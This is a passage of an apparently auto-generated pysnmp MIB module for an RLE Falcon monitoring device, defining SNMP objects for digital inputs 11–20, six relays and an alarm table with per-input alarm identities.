if mibBuilder.loadTexts: falconInput11RlyControl.setStatus('mandatory')
falconInput11Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Delay.setStatus('mandatory')
falconInput12 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28))
falconInput12State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12State.setStatus('mandatory')
falconInput12Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput12Reading.setStatus('mandatory')
falconInput12Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Label.setStatus('mandatory')
falconInput12RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12RlyControl.setStatus('mandatory')
falconInput12Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Delay.setStatus('mandatory')
falconInput13 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29))
falconInput13State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13State.setStatus('mandatory')
falconInput13Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput13Reading.setStatus('mandatory')
falconInput13Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Label.setStatus('mandatory')
falconInput13RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13RlyControl.setStatus('mandatory')
falconInput13Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Delay.setStatus('mandatory')
falconInput14 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30))
falconInput14State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14State.setStatus('mandatory')
falconInput14Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput14Reading.setStatus('mandatory')
falconInput14Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Label.setStatus('mandatory')
falconInput14RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14RlyControl.setStatus('mandatory')
falconInput14Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Delay.setStatus('mandatory')
falconInput15 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31))
falconInput15State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15State.setStatus('mandatory')
falconInput15Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput15Reading.setStatus('mandatory')
falconInput15Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Label.setStatus('mandatory')
falconInput15RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15RlyControl.setStatus('mandatory')
falconInput15Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 50), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Delay.setStatus('mandatory')
falconInput16 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32))
falconInput16State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16State.setStatus('mandatory')
falconInput16Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput16Reading.setStatus('mandatory')
falconInput16Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Label.setStatus('mandatory')
falconInput16RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16RlyControl.setStatus('mandatory')
falconInput16Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Delay.setStatus('mandatory')
falconInput17 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33))
falconInput17State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17State.setStatus('mandatory')
falconInput17Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput17Reading.setStatus('mandatory')
falconInput17Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Label.setStatus('mandatory')
falconInput17RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17RlyControl.setStatus('mandatory')
falconInput17Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Delay.setStatus('mandatory')
falconInput18 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34))
falconInput18State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18State.setStatus('mandatory')
falconInput18Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput18Reading.setStatus('mandatory')
falconInput18Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Label.setStatus('mandatory')
falconInput18RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18RlyControl.setStatus('mandatory')
falconInput18Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Delay.setStatus('mandatory')
falconInput19 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35))
falconInput19State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19State.setStatus('mandatory')
falconInput19Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput19Reading.setStatus('mandatory')
falconInput19Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Label.setStatus('mandatory')
falconInput19RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19RlyControl.setStatus('mandatory')
falconInput19Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Delay.setStatus('mandatory')
falconInput20 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36))
falconInput20State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20State.setStatus('mandatory')
falconInput20Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput20Reading.setStatus('mandatory')
falconInput20Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Label.setStatus('mandatory')
falconInput20RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20RlyControl.setStatus('mandatory')
falconInput20Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Delay.setStatus('mandatory')
falconOutputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4))
falconRelay1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1))
falconRelay1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1State.setStatus('mandatory')
falconRelay1Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay1Status.setStatus('mandatory')
falconRelay1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Label.setStatus('mandatory')
falconRelay1Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Time.setStatus('mandatory')
falconRelay2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2))
falconRelay2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2State.setStatus('mandatory')
falconRelay2Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay2Status.setStatus('mandatory')
falconRelay2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Label.setStatus('mandatory')
falconRelay2Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Time.setStatus('mandatory')
falconRelay3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3))
falconRelay3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3State.setStatus('mandatory')
falconRelay3Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay3Status.setStatus('mandatory')
falconRelay3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Label.setStatus('mandatory')
falconRelay3Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Time.setStatus('mandatory')
falconRelay4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4))
falconRelay4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4State.setStatus('mandatory')
falconRelay4Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay4Status.setStatus('mandatory')
falconRelay4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Label.setStatus('mandatory')
falconRelay4Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Time.setStatus('mandatory')
falconRelay5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5))
falconRelay5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5State.setStatus('mandatory')
falconRelay5Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay5Status.setStatus('mandatory')
falconRelay5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Label.setStatus('mandatory')
falconRelay5Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Time.setStatus('mandatory')
falconRelay6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6))
falconRelay6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6State.setStatus('mandatory')
falconRelay6Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay6Status.setStatus('mandatory')
falconRelay6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Label.setStatus('mandatory')
falconRelay6Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Time.setStatus('mandatory')
falconAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5))
falconAlarmsPresent = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmsPresent.setStatus('current')
falconAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2), )
if mibBuilder.loadTexts: falconAlarmTable.setStatus('current')
falconAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1), ).setIndexNames((0, "RLE-FALCON-MIB", "falconAlarmId"))
if mibBuilder.loadTexts: falconAlarmEntry.setStatus('current')
falconAlarmId = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 1), PositiveInteger())
if mibBuilder.loadTexts: falconAlarmId.setStatus('current')
falconAlarmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmDescr.setStatus('current')
falconWellKnownAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3))
falconInput1HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 1))
if mibBuilder.loadTexts: falconInput1HighAlarm.setStatus('current')
falconInput1LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 2))
if mibBuilder.loadTexts: falconInput1LowAlarm.setStatus('current')
falconInput1High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 3))
if mibBuilder.loadTexts: falconInput1High2Alarm.setStatus('current')
falconInput1Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 4))
if mibBuilder.loadTexts: falconInput1Low2Alarm.setStatus('current')
falconInput2HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 5))
if mibBuilder.loadTexts: falconInput2HighAlarm.setStatus('current')
falconInput2LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 6))
if mibBuilder.loadTexts: falconInput2LowAlarm.setStatus('current')
falconInput2High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 7))
if mibBuilder.loadTexts: falconInput2High2Alarm.setStatus('current')
falconInput2Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 8))
if mibBuilder.loadTexts: falconInput2Low2Alarm.setStatus('current')
falconInput3HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 9))
if mibBuilder.loadTexts: falconInput3HighAlarm.setStatus('current')
falconInput3LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 10))
if mibBuilder.loadTexts: falconInput3LowAlarm.setStatus('current')
falconInput3High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 11))
if mibBuilder.loadTexts: falconInput3High2Alarm.setStatus('current')
falconInput3Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 12))
if mibBuilder.loadTexts: falconInput3Low2Alarm.setStatus('current')
falconInput4HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 13))
if mibBuilder.loadTexts: falconInput4HighAlarm.setStatus('current')
falconInput4LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 14))
if mibBuilder.loadTexts: falconInput4LowAlarm.setStatus('current')
falconInput4High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 15))
if mibBuilder.loadTexts: falconInput4High2Alarm.setStatus('current')
falconInput4Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 16))
if mibBuilder.loadTexts: falconInput4Low2Alarm.setStatus('current')
falconInput5HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 17))
if mibBuilder.loadTexts: falconInput5HighAlarm.setStatus('current')
falconInput5LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 18))
if mibBuilder.loadTexts: falconInput5LowAlarm.setStatus('current')
falconInput5High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 19))
if mibBuilder.loadTexts: falconInput5High2Alarm.setStatus('current')
falconInput5Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 20))
if mibBuilder.loadTexts: falconInput5Low2Alarm.setStatus('current')
falconInput6HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 21))
if mibBuilder.loadTexts: falconInput6HighAlarm.setStatus('current')
falconInput6LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 22))
if mibBuilder.loadTexts: falconInput6LowAlarm.setStatus('current')
falconInput6High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 23))
if mibBuilder.loadTexts: falconInput6High2Alarm.setStatus('current')
falconInput6Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 24))
if mibBuilder.loadTexts: falconInput6Low2Alarm.setStatus('current')
falconInput7HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 25))
if mibBuilder.loadTexts: falconInput7HighAlarm.setStatus('current')
falconInput7LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 26))
if mibBuilder.loadTexts: falconInput7LowAlarm.setStatus('current')
falconInput7High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 27))
if mibBuilder.loadTexts: falconInput7High2Alarm.setStatus('current')
